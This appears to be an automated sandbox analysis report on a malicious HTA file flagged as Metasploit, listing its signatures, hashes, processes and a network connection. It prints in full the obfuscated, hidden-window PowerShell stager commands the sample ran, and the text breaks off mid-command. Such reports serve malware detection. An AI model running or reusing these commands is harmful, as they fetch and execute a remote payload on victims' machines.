Analysis Overview
SHA256
b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1
Threat Level: Known bad
The file b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1.hta was found to be: Known bad.
Malicious Activity Summary
MetaSploit
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-31 08:27
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-31 08:27
Reported
2024-05-31 08:30
Platform
win7-20240508-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjADAAbQA4AFcAbABNAHoARQAyAE0ASQArAG8AVwBoAEYAVgBmAEMAZwByAHgARwBjAGsAeABxAFIAVgBpACcAJwArACcAJwBBAC8AQgBSAEwAZQA4ADIAaQBHAGMAUwBSAGcASQBzAEoATQB5AFMARwB6ACsAcABuAFUAWgBVAFAATwBrAGEARwBXAFUAZQBTAFoAQQBMAGcAVQAzAEIASwA0AGgANQA1AFUAZABuAHQAcABGAFQAeQA3ADIANABUAHkASQBBAGMAUABzAE4AWgBDADMANQBrAEMAYQBrAGsATgA2AGwAeABxAHsAMQB9ADQAWABYADYARABVAEwAbgBOAGMASgBwAFcARgBUAHUARABQAEgAVwByACcAJwArACcAJwBpAGsATQAnACcAKwAnACcAdwBJADEANQBWAFEAWABGAEsAZAAxAHMAJwAnACsAJwAnAG8ARQB6AHkAZgBsAHAALwBkADcAVwBkAE0AVQBCAGUAbgBvAGoAQwAzAHEAUAB3AGIAegAnACcAKwAnACcAOQAyADUAYgBSADYAbgBJAHMAbABjACcAJwArACcAJwBpAEMAMQBnAGMATwBXAHMAaQBFAHMAeABrADUAQgBVAGwAUwA3ADEAaQBMAEYAeABhAEYAQwBjAFgAMwA0AFIAawBEAFoAbQBEAFAASQBIAEwATgAxAEQAUQBHAEIARgBBAHUARQBJAHkAWgBnAEUAWABNADMAWgBVAGEAawA1AFIAUABTAGkARgBTAE0AUgB5AE8AUwBGAHcAMgBJADQAZwBEAEsAeAB5ADUASwBjAHsAMQB9AGoAZwBnAFgAdgBrADEAVAA0AHQAcwAyAEYASgBmAHsAMQB9AGwATwBBAHMAdQBjAG4AQgBOAHgAaABYAEYAUwBWAEMAVQAwAEUAMQBDAEcASgBjADAANgB5AC8AKwBYAEgAegB5AFYAbwA2ADEAQQA3AEkAYgBzAFEAcQBVAFcAbQB6AHsAMQB9ADIATgBrAE0AbABRAGUAaAB5AFoAQQA4AG4AVgBIAFUANAA1AEsAbwBrAEEAUgBLAHkARQBSAHcAWgBPAHkAVwBGAHIAVwAyAC8AVQBEADkAbwBsAHQAUgBHAE0AVwBTADkAbQBmAGUAOQBzAFMAZQB1ADkATgBmAHoANgA4AEIAdgBUAFoAbwAvADMALwBTAE4AYgA2AEQAegBxAHUAKwAzAFUANwBsAGgASABpAEsANgBEAHQAWABzADAAUQBLADUAMwA1AHAARgBqAFoAOQBJAFMAegBtAGwAUAB0AEcAMwBVAEgAVgBMAGQAYQBJAFcAdQBvAFYAJwAnACsAJwAnAC8ASgBlAFQAMABJAGsASABkADUANABSAGoAaABNACcAJwArACcAJwBIAFMAWgBiAHAAdABkAHoAWgBtAGwATwBsADEAMwBwADkATABXADEAbwBiAGIAYQBuAFcAdgBkAGQAUgBzAHQAaQA2AGIAKwBoAEkAUQBuACcAJwArACcAJwBJAEgAZQBFAG4AbQBEAGkASwA0AGYATABtAEQAdQBTAGgAdABHAEwAegBYADAASABqAHMAOQAnACcAKwAnACcAYQA0ADkAdQBwAHcAMwByAFoAcwBxADYAVwBzAHMASwAvAFMAbABQAG4AYwBPAFoAcQBXAG4AYQBzAHsAMQB9AGYATgAvAGcAewAxAH0AaABnADMAdgBOAC8AdQBhADYAUAB1AEoAWABYAFQAYwB5AFcAagBIAFgAagAnACcAKwAnACcAdAB1AHQASgBUAHAARgBxAEIAMgBmAFQAaQB5AEQAbgA4ACsATQBCAE4AbgBhAEIAQQBjAHIAagBvAGEAZgBtAGoAdwBLADIAdQBqAHMAdwBhAEQAawBaAGoAaQAyAGoATwBIAFEATQB0AEMANAA4AC8AWABPAFAATgB7ADEAfQBDADcAWABoADYAagBVAE4AagBPAG0AbgBRAG0AOQBYADEASwBJAFIAdgBhADkAMABkAG4AbQB0ADYAcQArAGUAUgBSADAANABsAGMAQgAyAE8AYwBHAGoAeQBVAHoAbQAzAFAATQA5ADgANABKAFoANQBhADYANgBFAE4AYQAxAFAAQgBwADIAUAA2AGMAUABaACcAJwArACcAJwBOAGUANQBmAEoASgBlAFcAcAB0AFcAbgBJAEIAdQBNAHcARgA3AFEAYgByAGkAaABEAC8AYgBNAGoAOABqADQATwBPAEIAcABBAHkAOABOAGoAZwB4AHAANAArAHsAMQB9AE8AZABjAEwAWgB5AHIASQBaADcARgArAE4ARwB4AHgATgAyAE8AQQBhAG8ANAB1AGIAagBiAFEAeABzADEAdQBvAHEALwBOAHAASgAwAEIARAAnACcAKwAnACcARQBNAGUAQgBNAGMAUQBvAHYAVABjAGYAVABhADAAKwA4AGIAZwAzAC8AVwBNAHcAOAA3AFgASgBOAGYAdQBrAG0AZQAyAGgASAB7ADEAfQA0ADEATwBWAGIAawBIAHYANgB1AHUAKwBhADUAZQAxAE4AZgB1ADUAZQBmAGoAaQA2AG0AZABCAEoAeABCACcAJwArACcAJwBOAHUAVABEADAAQwBnACsAWgBqAEcAbwB0AGwAewAnACcAKwAnACcAMQB9AGwAQgA1ADgAVwBXADMAZgB2AHkAdAA1AGsAegAwAEsAdgBkAFoASAArAGoAaABKAFEAOAB5AEEAVwB0AEEAZwBpAGsAUwAzAGUARwBMAHQAaQByADcATgBxAGQAUgBRAFYAWABnADQATABFAGsAUwBFAHcAYgBOAEYAdABwAHgAawBSAHUASQBNAGUANwBLAGgAZwBQAE4AQQBWAHIAZAB0AGcASABKAGYAagBqAHUANQBlADYAOABOAEsAcwBvAFQAJwAnACsAJwAnADQASwBWADUAegBaAFUATABKADIAYwAzAEkAQwBIAE0AdABVAGcAQwBXAG8AWABKAEEANQBFAFcATgBVAGYAbQByAG8ATwBMAFUAUgAvADAARgB0ADUAVAByADMAOQBYAG0AMgArADIAcQBpADUAcwBhAHAAcwBRAGcAQgBMAHsAMQB9AFoAdgBsAHQAcwBFAGMAOQBSAFYAVgAvAGQAMQBJAHcAUwB0AEQAUQBMAEYANwBEAGEAdgBYAHsAMQB9AEkATgB6AGwAMQBDAHsAMQB9AG8ARgBSAHUAUwA0AFUARQB6ACsAQwBjADcAVQBPAFgAMwArAG0ASgBBAFAAdQA0AEEAVwBCADEAdQBQAFIAYwB2AGkANgBBAEcAYQBCADkAUQBPADYAVQBrAHAARABOAGQANwArAFoAbAAwAFQANABPADgAbQB5AHEAMwBVAGgALwBQAE4AKwBUAFoAYgBuAHQAVgAvAHMAdgBvAGwAQQBlAGwAWABDADgAdABQAGkAagB3AHQANwBmAGUASwAzAFgAWAA2AEsAcQBRAEEANQBCADgAbwAxAEkAOQB1AEgAeABFAHMAewAxAH0ANwBIAEoAagBMADYAbwA1ADcALwAzAGQAawBJAC8AcgB5ADAAdwBjAEQATwBDAHgAbAByAGUATABmAHcAQQBnADIANQBRADQAMAB3AHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBZACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAEgH62UCA7VWbW/iOBD+vtL+h2iFRNBSEl6u21Za6RzSAG2hgRQoZdHJTZzEixPTxCmle/vfbxxIy9'+'62q95Ja4nWsWfG42eembGfxa6gPFbilvLt/TtlN2yc4EhRSzw1xlWllDUrz3ulNDs'+'8Uj4r6hytViaPMI0XJyftLElILLbftQ4RKE1JdMsoSdWK8rcyDUlCDi5vvxJXKN+U0l+1DuO3mO3ENm3shkQ5QLEn9y64i6VbNWfFqFDLX76UK/OD+qJ2epdhlqplZ5MKEtU8xsoV5XtFHni1WRG13KduwlPui9qUxs1GbRyn2CcDsHZP+kSE3EvLcJnn6yREZEm8vZU0sxVSyzC1E+4iz0tImparylweMF8s/lTnu9NHWSxoRGq9WJCErxyS3FOXpLUujj1GRsRfgJ{1}jE'+'hoHi0oFxO75kqilOGOsqvwXM+qArAvs3qqk7iuBlC2SShVC+sI9+9zLGNlqll9wNKdBBcaWCgDfd4mg/8Sdwxe487xQjHm+Q8Bf1e{1}pzVU'+'/K3pV6cPJWPBkA5+lqyQjlcUT2krp0R4l1bdaqxeqoEgm68{1}5rM0nnHqLZws/hL+0nPm9rpR6nc0m8WlMzE2MI+oWhFVfCgrxGckxqRVi'+'A/BRLe82iGcSRgIsJMySGz+pnUZUPOkaGWUeSZALgU3BK4h55UdntpFTy724TyIAcPsNZC35kCakkN6lxq{1}4XX6DULnNcJpWFTuDPHWr'+'ikM'+'wI15VQXFKd1s'+'oEzyflp/d7WdMUBenojC3qPwbz'+'925bR6nIslc'+'iC1gcOWsiEsxk5BUlS71iLFxaFCcX34RkDZmDPIHLN1DQGBFAuEIyZgEXM3ZUak5RPSiFSMRyOSFw2I4gDKxy5Kc{1}jggXvk1T4ts2FJf{1}lOAsucnBNxhXFSVCU0E1CGJc06y/+XHzyVo61A7IbsQqUWmz{1}2NkMlQehyZA8nVHU45KokARKyERwZOyWFrW2/UD9oltRGMWS9mfe9sSeu9Nfz68BvTZo/3/SNb6Dzqu+3U7lhHiK6DtXs0QK535pFjZ9ISzmlPtG3UHVLdaIWuoV'+'/JeT0IkHd54RjhM'+'HSZbptdzZmlOl13p9LW1obbanWvddRsti6b+hIQn'+'IHeEnmDiK4fLmDuShtGLzX0Hjs9'+'a49upw3rZsq6WssK/SlPncOZqWnas{1}fN/g{1}hg3vN/ua6PuJXXTcyWjHXj'+'tutJTpFqB2fTiyDn8+MBNnaBAcrjoafmjwK2ujswaDkZji2jOHQMtC48/XOPN{1}C7Xh6jUNjOmnQm9X1KIRva90dnmt6q+eRR04lcB2OcGjyUzm3PM984JZ5a66ENa1PBp2P6cPZ'+'Ne5fJJeWptWnIBuMwF7QbrihD/bMj8j4OOBpAy8Njgxp4+{1}OdcLZyrIZ7F+NGxxN2OAao4ubjbQxs1uoq/NpJ0BD'+'EMeBMcQovTcfTa0+8bg3/WMw87XJNfukme2hH{1}41OVbkHv6uu+a5e1Nfu5efji6mdBJxB'+'NuTD0Cg+ZjGotl{'+'1}lB58WW3fvyt5kz0KvdZH+jhJQ8yAWtAgikS3eGLtir7NqdRQVXg4LEkSEwbNFtpxkRuIMe7KhgPNAVrdtgHJfjju5e68NKsoT'+'4KV5zZULJ2c3ICHMtUgCWoXJA5EWNUfmroOLUR/0Ft5Tr39Xm2+2qi5sapsQgBL{1}ZvltsEc9RVV/d1IwStDQLF7DavX{1}INzl1C{1}oFRuS4UEz+Cc7UOX3+mJAPu4AWB1uPRcvi6AGaB9QO6UkpDNd7+Zl0T4O8myq3Uh/PN+TZbntV/svolAelXC8tPijwt7feK3XX6KqQA5B8o1I9uHxEs{1}7HJjL6o57/3dkI/ry0wcDOCxlreLfwAg25Q40wsAAA{0}{0}')-f'=','Y')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
Network
| Country | Destination | Domain | Proto |
| CN | 1.14.247.162:40001 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 5c54bbe30a6193ff03203ca17e6fccca |
| SHA1 | 42312ffae8b50ef3c3f3c681ac9b9e54ccb58788 |
| SHA256 | 8baf0555d9c561f95b3b2523727a8fe10daac5cd3c3218d32b0ba8067e043bd1 |
| SHA512 | 966251b0c7434c9950a6d2d7115d359afa9283f433cc96e383d9d7aaf27082a88682dc6373debcbb2c15c2f64f0da839dd3723d1aa5d6a166febf14621f10f6a |
memory/1276-7-0x0000000005FC0000-0x0000000005FC1000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-31 08:27
Reported
2024-05-31 08:30
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4824 wrote to memory of 4340 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4824 wrote to memory of 4340 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4824 wrote to memory of 4340 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4340 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4340 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 4340 wrote to memory of 4364 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b59ee8a77c8d3311b14eb8850aee1e9230e1035dffe7c310529e1201bcbb74f1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEARQBnAEgANgAyAFUAQwBBADcAVgBXAGIAVwAvAGkATwBCAEQAKwB2AHQATAArAGgAMgBpAEYAUgBOAEIAUwBFAGwANgB1ADIAMQBaAGEANgBSAHoAUwBBAEcAMgBoAGcAUgBRAG8AWgBkAEgASgBUAFoAegBFAGkAeABQAFQAeABDAG0AbABlAC8AdgBmAGIAeAB4AEkAeQA5ACcAJwArACcAJwA2ADIAcQA5ADUASgBhADQAbgBXAHMAVwBmAEcANAAyAGUAZQBtAGIARwBmAHgAYQA2AGcAUABGAGIAaQBsAHYATAB0AC8AVAB0AGwATgAyAHkAYwA0AEUAaABSAFMAegB3ADEAeABsAFcAbABsAEQAVQByAHoAMwB1AGwATgBEAHMAJwAnACsAJwAnADgAVQBqADQAcgA2AGgAeQB0AFYAaQBhAFAATQBJADAAWABKAHkAZgB0AEwARQBsAEkATABMAGIAZgB0AFEANABSAEsARQAxAEoAZABNAHMAbwBTAGQAVwBLADgAcgBjAHkARABVAGwAQwBEAGkANQB2AHYAeABKAFgASwBOACsAVQAwAGwAKwAxAEQAdQBPADMAbQBPADMARQBOAG0AMwBzAGgAawBRADUAUQBMAEUAbgA5AHkANgA0AGkANgBWAGIATgBXAGYARgBxAEYARABMAFgANwA2AFUASwAvAE8ARAArAHEASgAyAGUAcABkAGgAbABxAHAAbABaADUATQBLAEUAdABVADgAeABzAG8AVgA1AFgAdABGAEgAbgBpADEAVwBSAEcAMQAzAEsAZAB1AHcAbABQAHUAaQA5AHEAVQB4AHMAMQBHAGIAUgB5AG4AMgBDAGMARABzAEgAWgBQACsAawBTAEUAMwBFAHYATABjAEoAbgBuADYAeQBSAEUAWgBFAG0AOAB2AFoAVQAwAHMAeABWAFMAeQB6AEMAMQBFACsANABpAHoAMAB0AEkAbQBwAGEAcgB5AGwAdwBlAE0ARgA4AHMALwBsAFQAbgB1ADkATgBIAFcAUwB4AG8AUgBHAHEAOQBXAEoAQwBFAHIAeAB5AFMAMwBGAE8AWABwAEwAVQB1AGoAagAxAEcAUgBzAFIAZgBnAEoAewAxAH0AagBFACcAJwArACcAJwBoAG8ASABpADAAbwBGAHgATwA3ADUAawBxAGkAbABPAEcATwBzAHEAdgB3AFgATQArAHEAQQByAEEAdgBzADMAcQBxAGsANwBpAHUAQgBsAEMAMgBTAFMAaABWAEMAKwBzAEkAOQArADkAegBMAEcATgBsAHEAbABsADkAdwBOAEsAZABCAEIAYwBhAFcAQwBnAEQAZgBkADQAbQBnAC8AOABTAGQAdwB4AGUANAA4ADcAeABRAGoASABtACsAUQA4AEIAZgAxAGUAewAxAH0AcAB6AFYAVQAnACcAKwAnACcALwBLADMAcABWADYAYwBQAEoAVwBQAEIAawBBADUAKwBsAHEAeQBRAGoAbABjAFUAVAAyAGsAcgBwADAAUgA0AGwAMQBiAGQAYQBxAHgAZQBxAG8ARQBnAG0ANgA4AHsAMQB9ADUAcgBNADAAbgBuAEgAcQBMAFoAdwBzAC8AaABMACsAMABuAFAAbQA5AHIAcABSADYAbgBjA